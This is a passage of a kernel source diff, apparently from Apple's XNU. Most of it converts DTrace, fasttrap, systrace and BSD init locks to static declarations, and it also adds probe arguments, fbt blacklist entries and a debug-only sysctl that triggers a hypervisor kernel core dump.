-               lck_mtx_init(&mod_lock, dtrace_lck_grp, dtrace_lck_attr);
 
                /*
                 * Initialize the CPU offline/online hooks.
@@ -19316,7 +19297,7 @@ dtrace_init( void )
 
                cpu_core = (cpu_core_t *)kmem_zalloc( ncpu * sizeof(cpu_core_t), KM_SLEEP );
                for (i = 0; i < ncpu; ++i) {
-                       lck_mtx_init(&cpu_core[i].cpuc_pid_lock, dtrace_lck_grp, dtrace_lck_attr);
+                       lck_mtx_init(&cpu_core[i].cpuc_pid_lock, &dtrace_lck_grp, &dtrace_lck_attr);
                }
 
                cpu_list = (dtrace_cpu_t *)kmem_zalloc( ncpu * sizeof(dtrace_cpu_t), KM_SLEEP );
@@ -19324,7 +19305,7 @@ dtrace_init( void )
                        cpu_list[i].cpu_id = (processorid_t)i;
                        cpu_list[i].cpu_next = &(cpu_list[(i+1) % ncpu]);
                        LIST_INIT(&cpu_list[i].cpu_cyc_list);
-                       lck_rw_init(&cpu_list[i].cpu_ft_lock, dtrace_lck_grp, dtrace_lck_attr);
+                       lck_rw_init(&cpu_list[i].cpu_ft_lock, &dtrace_lck_grp, &dtrace_lck_attr);
                }
 
                lck_mtx_lock(&cpu_lock);
@@ -19340,7 +19321,6 @@ dtrace_init( void )
                    offsetof(dtrace_string_t, dtst_next),
                    offsetof(dtrace_string_t, dtst_prev));
 
-               dtrace_isa_init();
                /*
                 * See dtrace_impl.h for a description of dof modes.
                 * The default is lazy dof.
index ffbd0bb15d4ddece6abc772d5832cf5bca67cce9..fa6dad3e72e3595721b1fe6d24f6559bd6a95b6b 100644 (file)
@@ -226,9 +226,9 @@ done:
 /*
  * cpuvar
  */
-lck_mtx_t cpu_lock;
-lck_mtx_t cyc_lock;
-lck_mtx_t mod_lock;
+LCK_MTX_DECLARE_ATTR(cpu_lock, &dtrace_lck_grp, &dtrace_lck_attr);
+LCK_MTX_DECLARE_ATTR(cyc_lock, &dtrace_lck_grp, &dtrace_lck_attr);
+LCK_MTX_DECLARE_ATTR(mod_lock, &dtrace_lck_grp, &dtrace_lck_attr);
 
 dtrace_cpu_t *cpu_list;
 cpu_core_t *cpu_core; /* XXX TLB lockdown? */
index 2ac848429ed8d5ff4baa734f1cba3eded5377752..cdc074485896cf60d9e39fb65d2b81b7af6ac441 100644 (file)
@@ -108,7 +108,7 @@ dtrace_fasttrap_fork(proc_t *p, proc_t *cp)
  * duty to resume the task.
  */
 
-lck_mtx_t dtrace_procwaitfor_lock;
+LCK_MTX_DECLARE_ATTR(dtrace_procwaitfor_lock, &dtrace_lck_grp, &dtrace_lck_attr);
 
 typedef struct dtrace_proc_awaited_entry {
        struct dtrace_procdesc                  *pdesc;
index e95eb2e1fe259150f33bf06544937f9ff5f7b2e6..7129aca09fb458657a8936e0d441362959f94725 100644 (file)
@@ -145,7 +145,10 @@ static dtrace_meta_provider_id_t fasttrap_meta_id;
 
 static thread_t fasttrap_cleanup_thread;
 
-static lck_mtx_t fasttrap_cleanup_mtx;
+static LCK_GRP_DECLARE(fasttrap_lck_grp, "fasttrap");
+static LCK_ATTR_DECLARE(fasttrap_lck_attr, 0, 0);
+static LCK_MTX_DECLARE_ATTR(fasttrap_cleanup_mtx,
+    &fasttrap_lck_grp, &fasttrap_lck_attr);
 
 
 #define FASTTRAP_CLEANUP_PROVIDER 0x1
@@ -179,7 +182,8 @@ static fasttrap_hash_t              fasttrap_provs;
 static fasttrap_hash_t         fasttrap_procs;
 
 static uint64_t                        fasttrap_pid_count;     /* pid ref count */
-static lck_mtx_t                       fasttrap_count_mtx;     /* lock on ref count */
+static LCK_MTX_DECLARE_ATTR(fasttrap_count_mtx,        /* lock on ref count */
+    &fasttrap_lck_grp, &fasttrap_lck_attr);
 
 #define        FASTTRAP_ENABLE_FAIL    1
 #define        FASTTRAP_ENABLE_PARTIAL 2
@@ -226,13 +230,6 @@ static const char *fasttrap_probe_t_zone_names[FASTTRAP_PROBE_T_ZONE_MAX_TRACEPO
        "dtrace.fasttrap_probe_t[3]"
 };
 
-/*
- * APPLE NOTE:  We have to manage locks explicitly
- */
-lck_grp_t*                     fasttrap_lck_grp;
-lck_grp_attr_t*                        fasttrap_lck_grp_attr;
-lck_attr_t*                    fasttrap_lck_attr;
-
 static int
 fasttrap_highbit(ulong_t i)
 {
@@ -406,7 +403,8 @@ typedef struct fasttrap_tracepoint_spec {
 
 static fasttrap_tracepoint_spec_t *fasttrap_retired_spec;
 static size_t fasttrap_cur_retired = 0, fasttrap_retired_size;
-static lck_mtx_t fasttrap_retired_mtx;
+static LCK_MTX_DECLARE_ATTR(fasttrap_retired_mtx,
+    &fasttrap_lck_grp, &fasttrap_lck_attr);
 
 #define DEFAULT_RETIRED_SIZE 256
 
@@ -598,7 +596,7 @@ fasttrap_setdebug(proc_t *p)
                        sprunlock(p);
                        p = PROC_NULL;
 
-                       mac_proc_check_get_task(state->dts_cred.dcr_cred, &pident);
+                       (void) mac_proc_check_get_task(state->dts_cred.dcr_cred, &pident, TASK_FLAVOR_CONTROL);
 
                        p = sprlock(pident.p_pid);
                        if (p == PROC_NULL) {
@@ -1521,7 +1519,7 @@ fasttrap_proc_lookup(pid_t pid)
        /*
         * APPLE NOTE: We have to initialize all locks explicitly
         */
-       lck_mtx_init(&new_fprc->ftpc_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
+       lck_mtx_init(&new_fprc->ftpc_mtx, &fasttrap_lck_grp, &fasttrap_lck_attr);
 
        new_fprc->ftpc_next = bucket->ftb_data;
        bucket->ftb_data = new_fprc;
@@ -1580,7 +1578,7 @@ fasttrap_proc_release(fasttrap_proc_t *proc)
         * APPLE NOTE: explicit lock management. Not 100% certain we need this, the
         * memory is freed even without the destroy. Maybe accounting cleanup?
         */
-       lck_mtx_destroy(&fprc->ftpc_mtx, fasttrap_lck_grp);
+       lck_mtx_destroy(&fprc->ftpc_mtx, &fasttrap_lck_grp);
 
        kmem_free(fprc, sizeof (fasttrap_proc_t));
 }
@@ -1663,8 +1661,8 @@ fasttrap_provider_lookup(proc_t *p, fasttrap_provider_type_t provider_type, cons
        /*
         * APPLE NOTE:  locks require explicit init
         */
-       lck_mtx_init(&new_fp->ftp_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
-       lck_mtx_init(&new_fp->ftp_cmtx, fasttrap_lck_grp, fasttrap_lck_attr);
+       lck_mtx_init(&new_fp->ftp_mtx, &fasttrap_lck_grp, &fasttrap_lck_attr);
+       lck_mtx_init(&new_fp->ftp_cmtx, &fasttrap_lck_grp, &fasttrap_lck_attr);
 
        ASSERT(new_fp->ftp_proc != NULL);
 
@@ -1747,8 +1745,8 @@ fasttrap_provider_free(fasttrap_provider_t *provider)
         * APPLE NOTE:  explicit lock management. Not 100% certain we need this, the
         * memory is freed even without the destroy. Maybe accounting cleanup?
         */
-       lck_mtx_destroy(&provider->ftp_mtx, fasttrap_lck_grp);
-       lck_mtx_destroy(&provider->ftp_cmtx, fasttrap_lck_grp);
+       lck_mtx_destroy(&provider->ftp_mtx, &fasttrap_lck_grp);
+       lck_mtx_destroy(&provider->ftp_cmtx, &fasttrap_lck_grp);
 
        kmem_free(provider, sizeof (fasttrap_provider_t));
 
@@ -2652,7 +2650,8 @@ fasttrap_attach(void)
        ASSERT(fasttrap_tpoints.fth_table != NULL);
 
        for (i = 0; i < fasttrap_tpoints.fth_nent; i++) {
-               lck_mtx_init(&fasttrap_tpoints.fth_table[i].ftb_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
+               lck_mtx_init(&fasttrap_tpoints.fth_table[i].ftb_mtx, &fasttrap_lck_grp,
+                   &fasttrap_lck_attr);
        }
 
        /*
@@ -2670,7 +2669,8 @@ fasttrap_attach(void)
        ASSERT(fasttrap_provs.fth_table != NULL);
 
        for (i = 0; i < fasttrap_provs.fth_nent; i++) {
-               lck_mtx_init(&fasttrap_provs.fth_table[i].ftb_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
+               lck_mtx_init(&fasttrap_provs.fth_table[i].ftb_mtx, &fasttrap_lck_grp,
+                   &fasttrap_lck_attr);
        }
 
        /*
@@ -2689,7 +2689,8 @@ fasttrap_attach(void)
 
 #ifndef illumos
        for (i = 0; i < fasttrap_procs.fth_nent; i++) {
-               lck_mtx_init(&fasttrap_procs.fth_table[i].ftb_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
+               lck_mtx_init(&fasttrap_procs.fth_table[i].ftb_mtx, &fasttrap_lck_grp,
+                   &fasttrap_lck_attr);
        }
 #endif
 
@@ -2786,19 +2787,6 @@ fasttrap_init( void )
                }
 
 
-               /*
-                * Create the fasttrap lock group. Must be done before fasttrap_attach()!
-                */
-               fasttrap_lck_attr = lck_attr_alloc_init();
-               fasttrap_lck_grp_attr= lck_grp_attr_alloc_init();
-               fasttrap_lck_grp = lck_grp_alloc_init("fasttrap",  fasttrap_lck_grp_attr);
-
-               /*
-                * Initialize global locks
-                */
-               lck_mtx_init(&fasttrap_cleanup_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
-               lck_mtx_init(&fasttrap_count_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
-
                fasttrap_attach();
 
                /*
@@ -2813,7 +2801,6 @@ fasttrap_init( void )
                fasttrap_retired_size = DEFAULT_RETIRED_SIZE;
                fasttrap_retired_spec = kmem_zalloc(fasttrap_retired_size * sizeof(*fasttrap_retired_spec),
                                        KM_SLEEP);
-               lck_mtx_init(&fasttrap_retired_mtx, fasttrap_lck_grp, fasttrap_lck_attr);
 
                fasttrap_inited = 1;
        }
index c399122556d6010d40d820ccda9c0c0801a73824..075227d1e9be141613c3501fc2cc1ea022b56546 100644 (file)
@@ -460,7 +460,7 @@ fbt_provide_module_kernel_syms(struct modctl *ctl)
        for (seg = firstsegfromheader(mh); seg != NULL; seg = nextsegfromheader(mh, seg)) {
                kernel_section_t *sect = firstsect(seg);
 
-               if (strcmp(seg->segname, "__KLD") == 0) {
+               if (strcmp(seg->segname, "__KLD") == 0 || strcmp(seg->segname, "__KLDDATA") == 0) {
                        continue;
                }
 
index a65e6a477f432e3ab6bbb8fc0e313590052a4f31..b06fdb36f3ab48724d86af05b183119f72141c9e 100644 (file)
@@ -206,6 +206,7 @@ const char * fbt_blacklist[] =
        CLOSURE(prf)
        CLOSURE(proc_best_name)
        CLOSURE(proc_is64bit)
+       X86_ONLY(proc_require)
        CRITICAL(rbtrace_bt)
        CRITICAL(register_cpu_setup_func)
        CRITICAL(ret64_iret)
@@ -241,6 +242,11 @@ const char * fbt_blacklist[] =
        CRITICAL(uread)
        CRITICAL(uwrite)
        CRITICAL(vstart)
+       X86_ONLY(zone_has_index)
+       X86_ONLY(zone_id_require)
+       X86_ONLY(zone_id_require_panic)
+       X86_ONLY(zone_range_contains)
+       X86_ONLY(zone_require_panic)
 };
 #define BLACKLIST_COUNT (sizeof(fbt_blacklist)/sizeof(fbt_blacklist[0]))
 
index b5a669e44363d0e464edf510286f6418af746856..49f40dcfffd9c4fb8cd17a09ab456c7ea4e8076b 100644 (file)
@@ -122,8 +122,6 @@ lockstat_probe_t lockstat_probes[] =
 };
 
 dtrace_id_t lockstat_probemap[LS_NPROBES];
-void (*lockstat_probe)(dtrace_id_t, uint64_t, uint64_t,
-    uint64_t, uint64_t, uint64_t);
 
 static dtrace_provider_id_t lockstat_id;
 
@@ -248,9 +246,6 @@ lockstat_attach(dev_info_t *devi)
                return DDI_FAILURE;
        }
 
-       lockstat_probe = dtrace_probe;
-       membar_producer();
-
        return DDI_SUCCESS;
 }
 
index 28e92734f273075ed32877514904a68de883f94b..67f056dab075a33a7be78bea1bb7b30cdbab9845 100644 (file)
@@ -972,6 +972,9 @@ sdt_argdesc_t sdt_args[] = {
        {"hv", "guest-enter", 1, 1, "uint64_t *", "guest_regs_t *" },
        {"hv", "guest-exit", 0, 0, "uint32_t", "uint32_t" },
        {"hv", "guest-exit", 1, 1, "uint64_t *", "guest_regs_t *" },
+       {"hv", "guest-error", 0, 0, "uint32_t", "uint32_t" },
+       {"hv", "guest-error", 1, 1, "uint64_t *", "guest_regs_t *" },
+       {"hv", "guest-error", 2, 2, "uint32_t", "uint32_t" },
        { NULL, NULL, 0, 0, NULL, NULL }
 };
 
index 0e483d76067fffab68be33ab60318df0e6c43709..1342e7785875b4d3a1cf25f8662cfc431bda6ba9 100644 (file)
@@ -82,9 +82,8 @@ extern const char *syscallnames[];
 #define LOADABLE_SYSCALL(a) 0 /* Not pertinent to Darwin. */
 #define LOADED_SYSCALL(a) 1 /* Not pertinent to Darwin. */
 
-extern lck_attr_t* dtrace_lck_attr;
-extern lck_grp_t* dtrace_lck_grp;
-static lck_mtx_t        dtrace_systrace_lock;           /* probe state lock */
+static LCK_MTX_DECLARE_ATTR(dtrace_systrace_lock,
+    &dtrace_lck_grp, &dtrace_lck_attr);           /* probe state lock */
 
 systrace_sysent_t *systrace_sysent = NULL;
 void (*systrace_probe)(dtrace_id_t, uint64_t, uint64_t, uint64_t, uint64_t, uint64_t);
@@ -406,7 +405,6 @@ systrace_init(const struct sysent *actual, systrace_sysent_t **interposed)
                s->stsy_underlying = a->sy_callc;
                s->stsy_return_type = a->sy_return_type;
        }
-       lck_mtx_init(&dtrace_systrace_lock, dtrace_lck_grp, dtrace_lck_attr);
 }
 
 
@@ -489,10 +487,12 @@ systrace_enable(void *arg, dtrace_id_t id, void *parg)
 
        lck_mtx_lock(&dtrace_systrace_lock);
        if (sysent[sysnum].sy_callc == systrace_sysent[sysnum].stsy_underlying) {
+               /* It is not possible to write to sysent[] directly because it is const. */
                vm_offset_t dss = ptrauth_nop_cast(vm_offset_t, &dtrace_systrace_syscall);
                ml_nofault_copy((vm_offset_t)&dss, (vm_offset_t)&sysent[sysnum].sy_callc, sizeof(vm_offset_t));
        }
        lck_mtx_unlock(&dtrace_systrace_lock);
+
        return 0;
 }
 
@@ -507,9 +507,20 @@ systrace_disable(void *arg, dtrace_id_t id, void *parg)
            systrace_sysent[sysnum].stsy_return == DTRACE_IDNONE);
 
        if (disable) {
+               /*
+                * Usage of volatile protects the if statement below from being optimized away.
+                *
+                * Compilers are clever and know that const array values can't change in time
+                * and the if below is always false. That is because it can't see that DTrace
+                * injects dtrace_systrace_syscall dynamically and violates constness of the
+                * array.
+                */
+               volatile const struct sysent *syscallent = &sysent[sysnum];
+
                lck_mtx_lock(&dtrace_systrace_lock);
-               if (sysent[sysnum].sy_callc == dtrace_systrace_syscall) {
-                       ml_nofault_copy((vm_offset_t)&systrace_sysent[sysnum].stsy_underlying, (vm_offset_t)&sysent[sysnum].sy_callc, sizeof(systrace_sysent[sysnum].stsy_underlying));
+               if (syscallent->sy_callc == dtrace_systrace_syscall) {
+                       ml_nofault_copy((vm_offset_t)&systrace_sysent[sysnum].stsy_underlying,
+                           (vm_offset_t)&syscallent->sy_callc, sizeof(vm_offset_t));
                }
                lck_mtx_unlock(&dtrace_systrace_lock);
        }
@@ -605,10 +616,10 @@ typedef struct {
 #endif /* MACH_ASSERT */
 } mach_trap_t;
 
-extern const mach_trap_t              mach_trap_table[]; /* syscall_sw.h now declares this as const */
-extern int                      mach_trap_count;
+extern const mach_trap_t mach_trap_table[]; /* syscall_sw.h now declares this as const */
+extern const int         mach_trap_count;
 
-extern const char *mach_syscall_name_table[];
+extern const char *const mach_syscall_name_table[];
 
 /* XXX From osfmk/i386/bsd_i386.c */
 struct mach_call_args {
@@ -845,6 +856,7 @@ machtrace_enable(void *arg, dtrace_id_t id, void *parg)
        lck_mtx_lock(&dtrace_systrace_lock);
 
        if (mach_trap_table[sysnum].mach_trap_function == machtrace_sysent[sysnum].stsy_underlying) {
+               /* It is not possible to write to mach_trap_table[] directly because it is const. */
                vm_offset_t dss = ptrauth_nop_cast(vm_offset_t, &dtrace_machtrace_syscall);
                ml_nofault_copy((vm_offset_t)&dss, (vm_offset_t)&mach_trap_table[sysnum].mach_trap_function, sizeof(vm_offset_t));
        }
@@ -865,10 +877,20 @@ machtrace_disable(void *arg, dtrace_id_t id, void *parg)
            machtrace_sysent[sysnum].stsy_return == DTRACE_IDNONE);
 
        if (disable) {
-               lck_mtx_lock(&dtrace_systrace_lock);
+               /*
+                * Usage of volatile protects the if statement below from being optimized away.
+                *
+                * Compilers are clever and know that const array values can't change in time
+                * and the if below is always false. That is because it can't see that DTrace
+                * injects dtrace_machtrace_syscall dynamically and violates constness of the
+                * array.
+                */
+               volatile const mach_trap_t *machtrap = &mach_trap_table[sysnum];
 
-               if (mach_trap_table[sysnum].mach_trap_function == (mach_call_t)dtrace_machtrace_syscall) {
-                       ml_nofault_copy((vm_offset_t)&machtrace_sysent[sysnum].stsy_underlying, (vm_offset_t)&mach_trap_table[sysnum].mach_trap_function, sizeof(vm_offset_t));
+               lck_mtx_lock(&dtrace_systrace_lock);
+               if (machtrap->mach_trap_function == (mach_call_t)dtrace_machtrace_syscall) {
+                       ml_nofault_copy((vm_offset_t)&machtrace_sysent[sysnum].stsy_underlying,
+                           (vm_offset_t)&machtrap->mach_trap_function, sizeof(vm_offset_t));
                }
                lck_mtx_unlock(&dtrace_systrace_lock);
        }
index d0ac4f6c899524134129714b3cbb08186cd1dcd9..0391f2c1897be08272e742bf69d74e6d098c9632 100644 (file)
@@ -165,15 +165,6 @@ dtrace_xcall(processorid_t cpu, dtrace_xcall_t f, void *arg)
        }
 }
 
-/*
- * Initialization
- */
-void
-dtrace_isa_init(void)
-{
-       return;
-}
-
 /*
  * Runtime and ABI
  */
index 944df9f64644d47edb99442221052850604d591b..e3c16031246a684dd62bc165e0582dda3988e8a1 100644 (file)
 #include <i386/mp.h>
 #include <kern/kalloc.h>
 
+#if DEBUG || DEVELOPMENT
+#include <kern/hvg_hypercall.h>
+#endif
+
 
 static int
 _i386_cpu_info SYSCTL_HANDLER_ARGS
@@ -1103,4 +1107,87 @@ SYSCTL_INT(_machdep_misc, OID_AUTO, traptrace_enabled,
     CTLFLAG_KERN | CTLFLAG_RW | CTLFLAG_LOCKED,
     &traptrace_enabled, 0, "Enabled/disable trap trace");
 
+
+/*
+ * Trigger a guest kernel core dump (internal only)
+ * Usage: sysctl kern.trigger_kernel_coredump = 1
+ * (option selector must be 1, other values reserved)
+ */
+
+static int
+sysctl_trigger_kernel_coredump(struct sysctl_oid *oidp __unused, void *arg1, int arg2, struct sysctl_req *req)
+{
+       int error = 0;
+       hvg_hcall_return_t hv_ret;
+       char buf[2]; // 1 digit for dump option + 1 '\0'
+
+       if (req->newptr) {
+               // Write request
+               if (req->newlen > 1) {
+                       return EINVAL;
+               }
+               error = SYSCTL_IN(req, buf, req->newlen);
+               buf[req->newlen] = '\0';
+               if (!error) {
+                       if (strcmp(buf, "1") != 0) {
+                               return EINVAL;
+                       }
+                       /* Issue hypercall to trigger a dump */
+                       hv_ret = hvg_hcall_trigger_dump(arg1, HVG_HCALL_DUMP_OPTION_REGULAR);
+
+                       /* Translate hypercall error code to syscall error code */
+                       switch (hv_ret) {
+                       case HVG_HCALL_SUCCESS:
+                               error = SYSCTL_OUT(req, arg1, 41);
+                               break;
+                       case HVG_HCALL_ACCESS_DENIED:
+                               error = EPERM;
+                               break;
+                       case HVG_HCALL_INVALID_CODE:
+                       case HVG_HCALL_INVALID_PARAMETER:
+                               error = EINVAL;
+                               break;
+                       case HVG_HCALL_IO_FAILED:
+                               error = EIO;
+                               break;
+                       case HVG_HCALL_FEAT_DISABLED:
+                       case HVG_HCALL_UNSUPPORTED:
+                               error = ENOTSUP;
+                               break;
+                       default:
+                               error = ENODEV;
+                       }
+               }
+       } else {
+               // Read request
+               error = SYSCTL_OUT(req, arg1, arg2);
+       }
+       return error;
+}
+
+
+static hvg_hcall_vmcore_file_t sysctl_vmcore;
+
+void
+hvg_bsd_init(void)
+{
+       if (!cpuid_vmm_present()) {
+               return;
+       }
+
+       if ((cpuid_vmm_get_applepv_features() & CPUID_LEAF_FEATURE_COREDUMP) != 0) {
+               /* Register an OID in the sysctl MIB tree for kern.trigger_kernel_coredump */
+               struct sysctl_oid *hcall_trigger_dump_oid = zalloc_permanent(sizeof(struct sysctl_oid), ZALIGN(struct sysctl_oid));
+               struct sysctl_oid oid = SYSCTL_STRUCT_INIT(_kern,
+                   OID_AUTO,
+                   trigger_kernel_coredump,
+                   CTLTYPE_STRING | CTLFLAG_RW,
+                   &sysctl_vmcore, sizeof(sysctl_vmcore),
+                   sysctl_trigger_kernel_coredump,
+                   "A", "Request that the hypervisor take a live kernel dump");
+               *hcall_trigger_dump_oid = oid;
+               sysctl_register_oid(hcall_trigger_dump_oid);
+       }
+}
+
 #endif /* DEVELOPMENT || DEBUG */
index 06a5c74320d37315d362f96b9d3ddfd7c5bc7339..c64e6360139348c0b9ca3daf079297e586080623 100644 (file)
 #include <sys/conf.h>
 #include <sys/vm.h>
 #include <sys/uio_internal.h>
-#include <sys/malloc.h>
+
+#include <kern/zalloc.h>
 
 #include <mach/vm_types.h>
 #include <mach/vm_param.h>
 #include <vm/vm_kern.h>         /* for kernel_map */
+#include <libkern/section_keywords.h>
 
 #include <pexpert/pexpert.h>    /* for PE_parse_boot_argn */
 
@@ -103,7 +105,7 @@ extern boolean_t kernacc(off_t, size_t );
 
 #endif
 
-static caddr_t devzerobuf;
+static SECURITY_READ_ONLY_LATE(caddr_t) devzerobuf;
 
 int mmread(dev_t dev, struct uio *uio);
 int mmwrite(dev_t dev, struct uio *uio);
@@ -219,10 +221,8 @@ mmrw(dev_t dev, struct uio *uio, enum uio_rw rw)
                        error = 0; /* Always succeeds, always consumes all input */
                        break;
                case 3:
-                       if (devzerobuf == NULL) {
-                               MALLOC(devzerobuf, caddr_t, PAGE_SIZE, M_TEMP, M_WAITOK);
-                               bzero(devzerobuf, PAGE_SIZE);
-                       }
+                       assert(devzerobuf != NULL);
+
                        if (uio->uio_rw == UIO_WRITE) {
                                c = uio_curriovlen(uio);
 
@@ -254,6 +254,14 @@ fault:
 #endif
 }
 
+__startup_func
+static void
+devzerobuf_init(void)
+{
+       devzerobuf = zalloc_permanent(PAGE_SIZE, ZALIGN_NONE); /* zeroed */
+}
+STARTUP(ZALLOC, STARTUP_RANK_LAST, devzerobuf_init);
+
 #if CONFIG_DEV_KMEM
 void
 dev_kmem_init(void)
index 6fc42ef7fdbd7d213c06728d7e32b97afa9da7e9..910f222882c39b6751f302cf83e04aa819079fd1 100644 (file)
@@ -60,7 +60,7 @@ static const struct cdevsw mt_cdevsw = {
 /*
  * Written at initialization, read-only thereafter.
  */
-lck_grp_t *mt_lock_grp = NULL;
+LCK_GRP_DECLARE(mt_lock_grp, MT_NODE);
 static int mt_dev_major;
 
 static mt_device_t
@@ -96,9 +96,6 @@ mt_device_assert_inuse(__assert_only mt_device_t dev)
 int
 mt_dev_init(void)
 {
-       mt_lock_grp = lck_grp_alloc_init(MT_NODE, LCK_GRP_ATTR_NULL);
-       assert(mt_lock_grp != NULL);
-
        mt_dev_major = cdevsw_add(-1 /* allocate a major number */, &mt_cdevsw);
        if (mt_dev_major < 0) {
                panic("monotonic: cdevsw_add failed: %d", mt_dev_major);
@@ -123,7 +120,7 @@ mt_dev_init(void)
                        __builtin_unreachable();
                }
 
-               lck_mtx_init(&mt_devices[i].mtd_lock, mt_lock_grp, LCK_ATTR_NULL);
+               lck_mtx_init(&mt_devices[i].mtd_lock, &mt_lock_grp, LCK_ATTR_NULL);
        }
 
        return 0;
index ced3cded223010e1ba96e64b24f8e59faa451a3f..800757bf53f39f98a2a9f87e549f64ff52b1f43f 100644 (file)
@@ -547,6 +547,12 @@ munge_llllll(void *args __unused)
        /* Nothing to do, already all 64-bit */
 }
 
+void
+munge_llll(void *args __unused)
+{
+       /* Nothing to do, already all 64-bit */
+}
+
 void
 munge_ll(void *args __unused)
 {
index c204382af4073b140f9f30bccbcea20f21d6e337..6dd42a5f0e71dcc7ecfd2fd43b297ad7d5e0a9cd 100644 (file)
 #include <dev/busvar.h>                 /* for pseudo_inits */
 #include <sys/kdebug.h>
 #include <sys/monotonic.h>
-#include <sys/reason.h>
 
 #include <mach/mach_types.h>
 #include <mach/vm_prot.h>
 #include <mach/semaphore.h>
 #include <mach/sync_policy.h>
 #include <kern/clock.h>
+#include <sys/csr.h>
 #include <mach/kern_return.h>
 #include <mach/thread_act.h>            /* for thread_resume() */
 #include <sys/mcache.h>                 /* for mcache_init() */
 #include <net/if_gif.h>                 /* for gif_init() */
 #include <miscfs/devfs/devfsdefs.h>     /* for devfs_kernel_mount() */
 #include <vm/vm_kern.h>                 /* for kmem_suballoc() */
-#include <sys/semaphore.h>              /* for psem_lock_init() */
 #include <sys/msgbuf.h>                 /* for log_setsize() */
-#include <sys/tty.h>                    /* for tty_init() */
 #include <sys/proc_uuid_policy.h>       /* proc_uuid_policy_init() */
 #include <netinet/flow_divert.h>        /* flow_divert_init() */
 #include <net/content_filter.h>         /* for cfil_init() */
@@ -231,17 +229,17 @@ int nswapmap;
 void *swapmap;
 struct swdevt swdevt[1];
 
+static LCK_GRP_DECLARE(hostname_lck_grp, "hostname");
+LCK_MTX_DECLARE(hostname_lock, &hostname_lck_grp);
+LCK_MTX_DECLARE(domainname_lock, &hostname_lck_grp);
+
 dev_t   rootdev;                /* device of the root */
 dev_t   dumpdev;                /* device to take dumps on */
 long    dumplo;                 /* offset into dumpdev */
 long    hostid;
 char    hostname[MAXHOSTNAMELEN];
-lck_mtx_t hostname_lock;
-lck_grp_t *hostname_lck_grp;
 char    domainname[MAXDOMNAMELEN];
-lck_mtx_t domainname_lock;
-
-char rootdevice[DEVMAXNAMESIZE];
+char    rootdevice[DEVMAXNAMESIZE];
 
 struct  vnode *rootvp;
 bool rootvp_is_ssd = false;
@@ -259,20 +257,14 @@ int legacy_footprint_entitlement_mode = LEGACY_FOOTPRINT_ENTITLEMENT_IGNORE;
 __private_extern__ int proc_ref_tracking_disabled = 0; /* disable panics on leaked proc refs across syscall boundary */
 #endif
 
-#if OS_REASON_DEBUG
-__private_extern__ int os_reason_debug_disabled = 0; /* disable asserts for when we fail to allocate OS reasons */
-#endif
-
 extern kern_return_t IOFindBSDRoot(char *, unsigned int, dev_t *, u_int32_t *);
 extern void IOSecureBSDRoot(const char * rootName);
 extern kern_return_t IOKitBSDInit(void );
 extern boolean_t IOSetRecoveryBoot(bsd_bootfail_mode_t, uuid_t, boolean_t);
 extern void kminit(void);
-extern void file_lock_init(void);
 extern void bsd_bufferinit(void);
 extern void oslog_setsize(int size);
 extern void throttle_init(void);
-extern void acct_init(void);
 
 #if CONFIG_LOCKERBOOT
 #define LOCKER_PROTOBOOT_MOUNT "/protoboot"
@@ -339,14 +331,13 @@ static void parse_bsd_args(void);
 #if CONFIG_DEV_KMEM
 extern void dev_kmem_init(void);
 #endif
-extern void time_zone_slock_init(void);
 extern void select_waitq_init(void);
 static void process_name(const char *, proc_t);
 
 static void setconf(void);
 
 #if CONFIG_BASESYSTEMROOT
-static int bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg);
+static int bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg, bool *skip_signature_check);
 static boolean_t bsdmgroot_bootable(void);
 #endif // CONFIG_BASESYSTEMROOT
 
@@ -411,25 +402,18 @@ extern struct os_refgrp rlimit_refgrp;
 extern thread_t cloneproc(task_t, coalition_t, proc_t, int, int);
 extern int      (*mountroot)(void);
 
-lck_grp_t * proc_lck_grp;
-lck_grp_t * proc_slock_grp;
-lck_grp_t * proc_fdmlock_grp;
-lck_grp_t * proc_kqhashlock_grp;
-lck_grp_t * proc_knhashlock_grp;
-lck_grp_t * proc_ucred_mlock_grp;
-lck_grp_t * proc_mlock_grp;
-lck_grp_t * proc_dirslock_grp;
-lck_grp_attr_t * proc_lck_grp_attr;
-lck_attr_t * proc_lck_attr;
-lck_mtx_t * proc_list_mlock;
-lck_mtx_t * proc_klist_mlock;
+LCK_ATTR_DECLARE(proc_lck_attr, 0, 0);
+LCK_GRP_DECLARE(proc_lck_grp, "proc");
+LCK_GRP_DECLARE(proc_slock_grp, "proc-slock");
+LCK_GRP_DECLARE(proc_fdmlock_grp, "proc-fdmlock");
+LCK_GRP_DECLARE(proc_mlock_grp, "proc-mlock");
+LCK_GRP_DECLARE(proc_ucred_mlock_grp, "proc-ucred-mlock");
+LCK_GRP_DECLARE(proc_dirslock_grp, "proc-dirslock");
+LCK_GRP_DECLARE(proc_kqhashlock_grp, "proc-kqhashlock");
+LCK_GRP_DECLARE(proc_knhashlock_grp, "proc-knhashlock");
 
-#if CONFIG_XNUPOST
-lck_grp_t * sysctl_debug_test_stackshot_owner_grp;
-lck_mtx_t * sysctl_debug_test_stackshot_owner_init_mtx;
-#endif /* !CONFIG_XNUPOST */
 
-extern lck_mtx_t * execargs_cache_lock;
+LCK_MTX_DECLARE_ATTR(proc_list_mlock, &proc_mlock_grp, &proc_lck_attr);
 
 #if XNU_TARGET_OS_OSX
 /* hook called after root is mounted XXX temporary hack */
@@ -438,7 +422,7 @@ void (*unmountroot_pre_hook)(void);
 #endif
 void set_rootvnode(vnode_t);
 
-extern lck_rw_t rootvnode_rw_lock;
+extern lck_rw_t rootvnode_rw_lock;
 
 /* called with an iocount and usecount on new_rootvnode */
 void
@@ -486,17 +470,6 @@ bsd_rooted_ramdisk(void)
        return is_ramdisk;
 }
 
-/*
- * This function is called before IOKit initialization, so that globals
- * like the sysctl tree are initialized before kernel extensions
- * are started (since they may want to register sysctls
- */
-void
-bsd_early_init(void)
-{
-       sysctl_early_init();
-}
-
 /*
  * This function is called very early on in the Mach startup, from the
  * function start_kernel_threads() in osfmk/kern/startup.c.  It's called
@@ -562,9 +535,6 @@ bsd_init(void)
        bsd_init_kprintf("calling procinit\n");
        procinit();
 
-       /* Initialize the ttys (MUST be before kminit()/bsd_autoconf()!)*/
